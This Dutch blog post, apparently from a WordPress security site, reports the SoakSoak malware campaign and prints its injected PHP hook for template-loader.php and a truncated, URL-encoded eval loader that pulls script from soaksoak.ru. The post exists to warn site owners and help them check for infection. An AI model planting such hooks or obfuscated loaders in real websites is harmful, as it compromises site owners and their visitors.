Meer dan 100.000 WordPress sites getroffen door soak soak malware


WordPress Security website en pluginbouwer Sucuri meldde vandaag dat meer dan 100.000 WordPress sites in de Google zoekmachine als malware zijn getagd. Is jouw website ook getroffen?

Volgens hetzelfde blogartikel op Sucuri is de voorlopige analyse dat deze malware te maken heeft met de beveiligingsrisico’s die de oude versie van Revslider had. De malware wordt aangestuurd via de Website soaksoak.ru deze is dan ook al geblacklist door Google en safebrowsing

Google-Blacklisting-SoakSoak.ru_

 

De meeste website die getroffen zijn, zijn WordPress website waarvan de plugins niet geupdated zijn.

SoakSoak malware analyse

Door de malware word de volgende code in het bestand wp-includes/template-loader.php toegevoegd:

<?php
function FuncQueueObject()

{
  
wp_enqueue_script("swfobject");

}

add_action("wp_enqueue_scripts", 'FuncQueueObject');

dit zorgt ervoor dat in WP-includes/js/swobject.js de volgende encrypted code op elke pagina van je website wordt geladen:

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Dit stukje code zorgt er op zijn beurt dan weer voor dat er een malware javascript  van het soaksoak.ru domein wordt geladen meer bepaald deze file: hxxp://soaksoak.ru/xteas/code

Denk je te zijn besmet door de Soaksoak malware, dan kan je dat checken op de Sucuri Free SiteCheck scanner hier een voorbeeld van hoe een besmette site eruit ziet als deze gedetecteerd wordt door de sucuri scanner.

Sucuri-SoakSoak-SiteCheck

Previous Kwetsbaarheid gevonden in WordPress Download Manager
Next WordPress 4.1 beschikbaar !

1 Comment

  1. […] Meer dan 100.000 WordPress sites […]